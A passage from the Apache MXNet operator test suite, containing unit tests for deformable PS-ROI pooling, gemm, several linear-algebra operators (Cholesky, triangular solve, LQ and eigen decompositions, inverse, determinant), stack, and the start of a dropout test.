roi_w, roi_h = roi_end_w - roi_start_w, roi_end_h - roi_start_h
bin_size_w, bin_size_h = roi_w / pooled_w, roi_h / pooled_h
sub_bin_size_w, sub_bin_size_h = bin_size_w / sample_per_part, bin_size_h / sample_per_part
for c_top in range(output_dim):
channel_each_cls = output_dim / num_classes
class_id = int(c_top / channel_each_cls)
for ph in range(pooled_h):
for pw in range(pooled_w):
part_h = int(math.floor(float(ph) / pooled_h * part_size))
part_w = int(math.floor(float(pw) / pooled_w * part_size))
trans_x = input_offset[roi_idx, class_id * 2, part_h, part_w] * trans_std
trans_y = input_offset[roi_idx, class_id * 2 + 1, part_h, part_w] * trans_std
bin_h_start, bin_w_start = ph * bin_size_h + roi_start_h, pw * bin_size_w + roi_start_w
need_check = True
while need_check:
pass_check = True
for ih in range(sample_per_part):
for iw in range(sample_per_part):
h = bin_h_start + trans_y * roi_h + ih * sub_bin_size_h
w = bin_w_start + trans_x * roi_w + iw * sub_bin_size_w
if w < -0.5 or w > feat_w - 0.5 or h < -0.5 or h > feat_h - 0.5:
continue
w = min(max(w, 0.1), feat_w - 1.1)
h = min(max(h, 0.1), feat_h - 1.1)
# if the following condiiton holds, the sampling location is not differentiable
# therefore we need to re-do the sampling process
if h - math.floor(h) < 1e-3 or math.ceil(h) - h < 1e-3 or w - math.floor(w) < 1e-3 or math.ceil(w) - w < 1e-3:
trans_x, trans_y = random.random() * trans_std, random.random() * trans_std
pass_check = False
break
if not pass_check:
break
if pass_check:
output_offset[roi_idx, class_id * 2 + 1, part_h, part_w] = trans_y / trans_std
output_offset[roi_idx, class_id * 2, part_h, part_w] = trans_x / trans_std
need_check = False
return output_offset
@unittest.skip("Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/11713")
@with_seed()
def test_deformable_psroipooling():
sample_per_part = 4
trans_std = 0.1
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([160, 224], [160, 224]):
for grad_nodes in [['im_data'], ['offset_data']]:
spatial_scale = 0.0625
stride = int(1 / spatial_scale)
feat_height = np.int(image_height * spatial_scale)
feat_width = np.int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1 - 2 * stride)) + stride
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1 - 2 * stride)) + stride
offset_data = np.random.rand(num_rois, 2*num_classes, num_group, num_group)
# at certain points, the bilinear interpolation function may be non-differentiable
# to avoid this, we check whether the input locates on the valid points
offset_data = _validate_sample_location(rois_data, offset_data, spatial_scale, num_group, num_group,
sample_per_part, num_group, num_classes, num_classes, trans_std, feat_height, feat_width)
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
op = mx.sym.contrib.DeformablePSROIPooling(data=im_data_var, rois=rois_data_var,
trans=offset_data_var, spatial_scale=spatial_scale,
sample_per_part=4, group_size=num_group,
pooled_size=num_group, output_dim=num_classes,
trans_std=0.1, no_trans=False, name='test_op')
rtol, atol = 1e-2, 1e-3
# By now we only have gpu implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, rois_data, offset_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _gemm_test_helper(dtype, grad_check, rtol_fw = 1e-7, atol_fw = 1e-9):
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
data3 = mx.symbol.Variable('data3')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
shape1 = (2, 3)
shape2 = (3, 2)
shape3 = (3, 3)
shape4 = (2, 2)
data_in1 = np.random.uniform(1, 10, shape1).astype(dtype)
data_in2 = np.random.uniform(1, 10, shape2).astype(dtype)
data_in3 = np.random.uniform(1, 10, shape3).astype(dtype)
data_in4 = np.random.uniform(1, 10, shape4).astype(dtype)
# Check all transpositions of gemm operator.
data_in1_t = np.transpose(data_in1)
data_in2_t = np.transpose(data_in2)
res_gemm = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [data_in1, data_in2, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in4])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True, transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in3])
res_gemm = 4. * np.dot(data_in1_t, data_in1) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in3])
res_gemm = 4. * np.dot(data_in1, data_in1_t) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in4])
# Check batch of gemm.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
c = rep_3x(data_in4, 2, 2)
r = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
r = rep_3x(r, 2, 2)
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [a, b, c], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b, c])
# Check for different axis that describes matrix rows.
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
c2 = np.copy(np.swapaxes(c, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = 0)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
c2 = np.copy(np.swapaxes(c, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = -3)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
# Check gemm2 operator same way as gemm.
res_gemm = 4. * np.dot(data_in1, data_in2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in1)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
res_gemm = 4. * np.dot(data_in1, data_in1_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
# Check batch of gemm2.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
r = rep_3x(4. * np.dot(data_in1, data_in2), 2, 2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [a, b], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b])
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = 0)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = -3)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
# Test gemm separately from other la-operators.
@with_seed()
def test_gemm():
_gemm_test_helper(np.float64, True)
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "0"
_gemm_test_helper(np.float32, False, rtol_fw = 1e-5, atol_fw = 1e-7)
if default_context().device_type == 'gpu':
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "1"
_gemm_test_helper(np.float32, False, rtol_fw = 2e-5, atol_fw = 2e-7)
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "0"
# Helper functions for test_laop
def _make_symm_symbol(a, ndims):
assert ndims >= 2
tr_shape = list(range(ndims))
tr_shape[-1] = ndims-2
tr_shape[-2] = ndims-1
tr_shape = tuple(tr_shape)
return 0.5 * (a + mx.sym.transpose(a, axes=tr_shape))
def _make_triangle_symm(a, ndims, m, lower, dtype=np.float32):
assert ndims >= 2
# The last two dimensions must both be m
# Create mask for lower triangle and diagonal
index = mx.sym.arange(start=0, stop=m, step=1, dtype=np.int32)
lt_mask = mx.sym.one_hot(index, depth=m, dtype=dtype)
for j in range(1, m):
part1 = mx.sym.zeros(shape=(j, m), dtype=dtype)
index = mx.sym.arange(start=0, stop=m-j, step=1, dtype=np.int32)
part2 = mx.sym.one_hot(index, depth=m, dtype=dtype)
lt_mask = lt_mask + mx.sym.concat(*[part1, part2], dim=0)
if not lower:
lt_mask = mx.sym.reshape(lt_mask, shape=(m, m))
lt_mask = mx.sym.transpose(lt_mask, axes=(1, 0))
shp = tuple([1]*(ndims-2) + [m, m])
lt_mask = mx.sym.reshape(lt_mask, shape=shp)
return mx.sym.broadcast_mul(a, lt_mask)
# @ankkhedia: Getting rid of fixed seed as flakiness could not be reproduced
# tracked at https://github.com/apache/incubator-mxnet/issues/11718
@with_seed()
def test_laop():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 2e-6
rtol_bw = 1e-5
atol_bw = 1e-5
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
def check_fw_grad(sym, location, expected):
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
if grad_check == 1:
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
matrix = np.array([[9., 3., -6., 12.],
[3., 26., -7., -11.],
[-6., -7., 9., 7.],
[12., -11., 7., 65.]])
trian = np.array([[3., 0., 0., 0.],
[1., 5., 0., 0.],
[-2., -1., 2., 0.],
[4., -3., 6., 2.]])
pow = np.array([[2., 1., 1., 1.],
[1., 4., 1., 1.],
[1., 1., 8., 1.],
[1., 1., 1., 16.]])
inv = np.array([[8.95/3., 0.05/3., 2.65, -2.5/3.],
[0.05/3., 0.05, 0.05, 0.],
[2.65, 0.05, 2.5, -0.75],
[-2.5/3., 0., -0.75, 0.25]])
ident = np.eye(4)
shape = (4, 4, 1, 1)
ones = mx.nd.ones(shape).asnumpy()
for lower in [True, False]:
upper = not lower
# Tests with trivial 1x1 matrices.
data_in = np.random.uniform(1, 10, shape)
# test potrf
# Note: Have to symmetrize input, for gradient test to work
res_potrf = np.sqrt(data_in)
test_potrf = mx.sym.linalg.potrf(data1, lower=lower)
check_fw_grad(test_potrf, [data_in], [res_potrf])
# test potri
res_potri = np.divide(ones, data_in * data_in)
test_potri = mx.sym.linalg.potri(data1, lower=lower)
check_fw_grad(test_potri, [data_in], [res_potri])
# test trsm
trian_in = data_in * 7.
test_trsm = mx.sym.linalg.trsm(data1, data2, alpha=7., lower=lower)
check_fw_grad(test_trsm, [trian_in, data_in], [ones])
# test trmm
trian_in = np.divide(ones, trian_in)
test_trmm = mx.sym.linalg.trmm(data1, data2, alpha=7., transpose=True,
rightside=True, lower=lower)
check_fw_grad(test_trmm, [trian_in, data_in], [ones])
# test sumlogdiag
res_sumlogdiag = np.reshape(np.log(data_in), (4, 4))
test_sumlogdiag = mx.sym.linalg.sumlogdiag(data1)
check_fw_grad(test_sumlogdiag, [data_in], [res_sumlogdiag])
# more elaborate example of Cholesky factorization
low_trian = trian
if upper:
trian = np.transpose(trian)
# test potrf
test_potrf = mx.sym.linalg.potrf(_make_symm_symbol(data1, ndims=4), lower=lower)
a = rep_3x(matrix, 4, 4)
r = rep_3x(trian, 4, 4)
check_fw_grad(test_potrf, [a], [r])
#test potri
data1_ltri = _make_triangle_symm(
data1, ndims=4, m=4, lower=lower, dtype=dtype)
test_potri = mx.sym.linalg.potri(data1_ltri, lower=lower)
a = rep_3x(trian, 4, 4)
r = rep_3x(inv, 4, 4)
check_fw_grad(test_potri, [a], [r])
# test trsm
test_trsm = mx.sym.linalg.trsm(data1_ltri, data2, alpha=7., transpose=upper, lower=lower)
b = rep_3x(matrix, 4, 4)
r = rep_3x(7. * np.transpose(low_trian), 4, 4)
check_fw_grad(test_trsm, [a, b], [r])
test_trsm2 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-2., rightside=True, transpose=lower, lower=lower)
r = rep_3x(-2. * low_trian, 4, 4)
check_fw_grad(test_trsm2, [a, b], [r])
test_trsm3 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=0.5, transpose=lower, lower=lower)
b = rep_3x(np.transpose(low_trian), 4, 4)
r = rep_3x(0.5 * ident, 4, 4)
check_fw_grad(test_trsm3, [a, b], [r])
test_trsm4 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-0.5, rightside=True, transpose=upper, lower=lower)
b = rep_3x(low_trian, 4, 4)
r = rep_3x(-0.5 * ident, 4, 4)
check_fw_grad(test_trsm4, [a, b], [r])
# test trmm
test_trmm = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=7., transpose=True, rightside=True, lower=lower)
a = [a, rep_3x(matrix, 4, 4)]
r = rep_3x(7. * np.dot(matrix, trian.T), 4, 4)
check_fw_grad(test_trmm, a, [r])
test_trmm2 = mx.sym.linalg.trmm(data1_ltri, data2, alpha=-2., lower=lower)
r = rep_3x(-2. * np.dot(trian, matrix), 4, 4)
check_fw_grad(test_trmm2, a, [r])
test_trmm3 = mx.sym.linalg.trmm(data1_ltri, data2, rightside=True, lower=lower)
r = rep_3x(np.dot(matrix, trian), 4, 4)
check_fw_grad(test_trmm3, a, [r])
test_trmm4 = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=1.2, transpose=True, lower=lower)
r = rep_3x(1.2 * np.dot(trian.T, matrix), 4, 4)
check_fw_grad(test_trmm4, a, [r])
# test sumlogdiag
r = np.reshape(np.tile(10. * np.log(np.array([2.])), 3), (3,))
check_fw_grad(test_sumlogdiag, [rep_3x(pow, 4, 4)], [r])
# Tests for operators linalg.syrk, linalg.gelqf
def _gelqf_combined_symbol(a):
q, l = mx.sym.linalg.gelqf(a)
q_qt = mx.sym.linalg.syrk(q, transpose=False, alpha=1., name='Q_times_Qt')
l_q = mx.sym.linalg.trmm(l, q, alpha=1., name='L_times_Q')
return mx.sym.Group([q_qt, l_q])
# NOTE: If we leave the unused output dangling, things break if dtype=np.float64. Namely, the
# backward gradient for the unused output is of dtype np.float32 then.
# ==> Very annoying!
def _gelqf_first_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(l), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(q, bogus_scal)
def _gelqf_second_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(q), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(l, bogus_scal)
def _syevd_combined_symbol(a):
u, lam = mx.sym.linalg.syevd(a)
u_ut = mx.sym.linalg.syrk(u, transpose=False, alpha=1., name='U_times_Ut')
lam_u = mx.sym.broadcast_mul(mx.sym.reshape(lam, shape=(-2, 1)), u)
ut_lam_u = mx.sym.linalg.gemm2(u, lam_u, alpha=1., transpose_a=True,
transpose_b=False, name='Ut_L_U')
return mx.sym.Group([u_ut, ut_lam_u])
@with_seed()
def test_laop_2():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
# Tests for linalg.syrk
mnalpha_lst = [(2, 3, 1.), (5, 3, -2.), (1, 6, 5.), (3, 3, 0.5), (4, 1, 10.), (1, 1, 1.)]
for m, n, alpha in mnalpha_lst:
#print('syrk: m={}, n={}, alpha={}'.format(m, n, alpha))
data_in1 = np.random.uniform(1, 10, (m, n))
res_syrk1 = alpha * np.dot(data_in1, data_in1.T)
test_syrk1 = mx.sym.linalg.syrk(data1, transpose=False, alpha=alpha)
check_fw(test_syrk1, [data_in1], [res_syrk1])
if grad_check == 1:
check_grad(test_syrk1, [data_in1])
res_syrk2 = alpha * np.dot(data_in1.T, data_in1)
test_syrk2 = mx.sym.linalg.syrk(data1, transpose=True, alpha=alpha)
check_fw(test_syrk2, [data_in1], [res_syrk2])
if grad_check == 1:
check_grad(test_syrk2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
r1_batch = rep_3x(res_syrk1, m, m)
check_fw(test_syrk1, [a_batch], [r1_batch])
if grad_check == 1:
check_grad(test_syrk1, [a_batch])
r2_batch = rep_3x(res_syrk2, n, n)
check_fw(test_syrk2, [a_batch], [r2_batch])
if grad_check == 1:
check_grad(test_syrk2, [a_batch])
# Tests for linalg.gelqf
# Currently disabled on GPU as they need cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
test_gelqf2 = _gelqf_combined_symbol(data1) # Outputs (dot(Q, Q.T), dot(L, Q))
test_gelqf_q = _gelqf_first_output(data1) # Output Q (L is not dangling)
test_gelqf_l = _gelqf_second_output(data1) # Output L (Q is not dangling)
mn_lst = [(4, 4), (1, 1), (5, 20), (1, 10), (15, 50)]
for m, n in mn_lst:
#print('gelqf: m={}, n={}'.format(m, n))
data_in1 = np.random.normal(0., 10., (m, n))
res_eye = np.eye(m)
res_a = data_in1
check_fw(test_gelqf2, [data_in1], [res_eye, res_a])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [data_in1])
# A => L
check_grad(test_gelqf_l, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
reye_batch = rep_3x(res_eye, m, m)
ra_batch = a_batch
check_fw(test_gelqf2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [a_batch])
# A => L
check_grad(test_gelqf_l, [a_batch])
# Tests for operator linalg.syevd
def _syevd_first_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(lam), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(u, bogus_scal)
def _syevd_second_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(u), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(lam, bogus_scal)
def _syevd_forward(a):
lam, ut = np.linalg.eig(a)
ind = np.argsort(lam)
lam = lam[ind]
u = ut[:, ind].T
for i in range(0, a.shape[0]):
_syevd_forw_eigvec_sign(u[i])
return u, lam
def _syevd_forw_eigvec_sign(v):
ind = np.argmax(np.abs(v))
if v[ind] < 0.:
v[:] = -v
def _syevd_backward(grad_u, grad_l, u, l):
n = l.size
assert grad_l.size == n
assert grad_u.shape == (n, n)
assert u.shape == (n, n)
temp = np.dot(grad_u, u.T)
temp2 = np.diag(grad_l)
for i in range(1, n):
for j in range(0, i):
denom = 2. * (l[i] - l[j])
elem = (temp[i, j] - temp[j, i])/denom
temp2[i, j] = elem
temp2[j, i] = elem
temp3 = np.dot(u.T, temp2)
return np.dot(temp3, u)
# Seed set because the test is not robust enough to operate on random data
@with_seed(1896893923)
def test_laop_3():
# Currently disabled on GPU as syevd needs cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
dtype = np.float64
rtol_fw = 1e-6
atol_fw = 1e-6
num_eps = 1e-4
rtol_bw = 1e-2
atol_bw = 1e-2
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol_fw, atol=atol_fw, dtype=dtype)
# Tests for linalg.syevd
test_syevd2 = _syevd_combined_symbol(data1) # Outputs (U U^T, U^T (diag L) U)
data1_s2 = _make_symm_symbol(data1, ndims=2)
test_syevd_u_2 = _syevd_first_output(data1_s2)
test_syevd_l_2 = _syevd_second_output(data1_s2)
data1_s4 = _make_symm_symbol(data1, ndims=4)
test_syevd_u_4 = _syevd_first_output(data1_s4)
test_syevd_l_4 = _syevd_second_output(data1_s4)
n_lst = [4, 1, 2, 10, 14]
for n in n_lst:
#print('\n** syevd: n={}'.format(n))
data_in1 = np.random.normal(0., 10., (n, n))
data_in1 = 0.5 * (data_in1 + data_in1.T)
res_eye = np.eye(n)
res_a = data_in1
check_fw(test_syevd2, [data_in1], [res_eye, res_a])
# Check backward
grad_u = np.random.normal(0., 2., (n, n))
grad_l = np.random.normal(0., 2., (n,))
bw_u, bw_l = _syevd_forward(data_in1)
grad_a = _syevd_backward(grad_u, grad_l, bw_u, bw_l)
check_bw(mx.sym.linalg.syevd(data1), [data_in1], [grad_u, grad_l], [grad_a])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_2, [data_in1])
# A => L
check_grad(test_syevd_l_2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, n, n)
reye_batch = rep_3x(res_eye, n, n)
ra_batch = a_batch
check_fw(test_syevd2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_4, [a_batch])
# A => L
check_grad(test_syevd_l_4, [a_batch])
# @piyushghai - Removing the fixed seed for this test.
# Issue for flakiness is tracked at - https://github.com/apache/incubator-mxnet/issues/11721
@with_seed()
def test_laop_4():
# Currently disabled on GPU as syevd needs cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
rtol_fw = 1e-6
atol_fw = 1e-6
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected, dtype :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
a_np = np.array([[1., 2.], [2., 4.]])
u_np = np.array([[0.89442718, -0.44721359], [0.44721359, 0.89442718]])
l_np = np.array([0., 5.])
test_syevd = mx.sym.linalg.syevd(data1)
# float64
#print('float64')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float64)
# float32
#print('float32')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float32)
def test_laop_5():
# tests for diagonal and triangular matrix extraction and generation
data = mx.symbol.Variable('data')
# test complete range of small matrices to cover corner cases
for n in range(1, 5):
# test batched and non-batched processing
for b in range(3):
shape = (n, n) if b == 0 else (b, n, n)
data_in = np.random.uniform(1, 10, shape)
# test all legal offsets of the diagonal
for offs in range(1-n, n):
# test extraction of diagonal
test_diag = mx.sym.linalg.extractdiag(data, offset=offs)
res_diag = np.diagonal(data_in, offset=offs) if b==0 else np.diagonal(data_in, axis1=1, axis2=2, offset=offs)
check_symbolic_forward(test_diag, [data_in], [res_diag])
check_numeric_gradient(test_diag, [data_in])
# test generation of diagonal matrix
test_diag2 = mx.sym.linalg.makediag(data, offset=offs)
res_diag2 = None
if b == 0:
res_diag2 = np.diagflat(res_diag, k=offs)
else:
for i in range(b):
res = np.reshape(np.diagflat(res_diag[i], k=offs), (1, n, n))
res_diag2 = res if res_diag2 is None else np.concatenate((res_diag2, res), axis=0)
check_symbolic_forward(test_diag2, [res_diag], [res_diag2])
check_numeric_gradient(test_diag2, [res_diag])
# check both settings for parameter "lower" in case of zero offset
lower_vals = [True] if offs != 0 else [True, False]
for lower in lower_vals:
# test extraction of triangle by doing a full roundtrip as the intermediate extracted
# triangle has different orderings than numpy.
test_trian = mx.sym.linalg.extracttrian(data, offset=offs, lower=lower)
test_trian = mx.sym.linalg.maketrian(test_trian, offset=offs, lower=lower)
extracts_lower = (offs < 0) or ((offs == 0) and lower)
res_trian = None
if b == 0:
res_trian = np.tril(data_in, offs) if extracts_lower else np.triu(data_in, offs)
else:
for i in range(b):
res = np.tril(data_in[i], offs) if extracts_lower else np.triu(data_in[i], offs)
res = np.reshape(res, (1, n, n))
res_trian = res if res_trian is None else np.concatenate((res_trian, res), axis=0)
check_symbolic_forward(test_trian, [data_in], [res_trian])
check_numeric_gradient(test_trian, [data_in])
# Tests for linalg.inverse
@with_seed()
@unittest.skip("Test crashes https://github.com/apache/incubator-mxnet/issues/15975")
def test_laop_6():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-4
atol_bw = 1e-6
data = mx.symbol.Variable('data')
check_fw = lambda sym, location, expected:\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
## det(I + dot(v, v.T)) = 1 + dot(v.T, v) >= 1, so it's always invertible;
## det is away from zero, so the value of logdet is stable
v = np.random.random(4)
a = np.eye(4) + np.outer(v, v)
a = np.tile(a, (3, 1, 1))
permute_mat = np.eye(4)[[1, 0, 2, 3]]
# test matrix inverse
r = np.eye(4)
r = np.tile(r, (3, 1, 1))
test_inverse = mx.sym.linalg.inverse(data)
test_eye = mx.sym.linalg.gemm2(data, test_inverse)
check_fw(test_eye, [a], [r])
check_grad(test_inverse, [a])
# test matrix determinant
# det
r = np.linalg.det(a)
test_det = mx.sym.linalg.det(data)
check_fw(test_det, [a], [r])
check_grad(test_det, [a])
# test slogdet
r1 = np.array([1., 1., 1.])
r2 = np.log(np.abs(np.linalg.det(a)))
test_sign, test_logabsdet = mx.sym.linalg.slogdet(data)
check_fw(test_sign, [a], [r1])
check_fw(test_sign, [np.dot(a, permute_mat)], [-r1])
check_fw(test_logabsdet, [a], [r2])
check_grad(test_logabsdet, [a])
@with_seed()
def test_stack():
for _ in range(100):
ndim = random.randint(1, 5)
axis = random.randint(0, ndim)
if random.randint(0, 1):
axis = axis - ndim - 1
nin = random.randint(1, 3)
dshape = [random.randint(1, 5) for _ in range(ndim)]
inputs = [np.random.uniform(size=dshape) for _ in range(nin)]
output = np.stack(inputs, axis=axis)
sym_ins = [mx.sym.var('x%d'%i) for i in range(nin)]
out = mx.sym.stack(*sym_ins, axis=axis)
check_symbolic_forward(out, inputs, [output])
check_numeric_gradient(out, inputs)
@with_seed()
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/14288")
def test_dropout():
def zero_count(array, ratio):
zeros = 0
for i in array:
if i == 0:
zeros += 1
elif math.isnan(i):
assert ratio == 1 # Only valid for ratio = 1
zeros += 1
return zeros
def check_correctness(executor, input, ratio):
input = input.ravel()
output = executor.outputs[0].asnumpy().ravel()
input_sum = np.sum(input)
output_sum = np.sum(output)
# Make sure input zeroes are none (test data setup check)
assert zero_count(input, ratio) == 0
# count number of zeroes in output
output_zeroes = zero_count(output, ratio)
# Hopefully should be within ratio/2 %
error = abs(output_sum - input_sum) / input_sum
if ratio == 1.0:
assert output_zeroes == len(input)
elif ratio > 0.2:
assert output_zeroes > 0
assert error < (ratio/2)
elif ratio == 0:
assert output_zeroes == 0
def check_dropout_ratio(ratio, shape, cudnn_off=True):
# test dropout
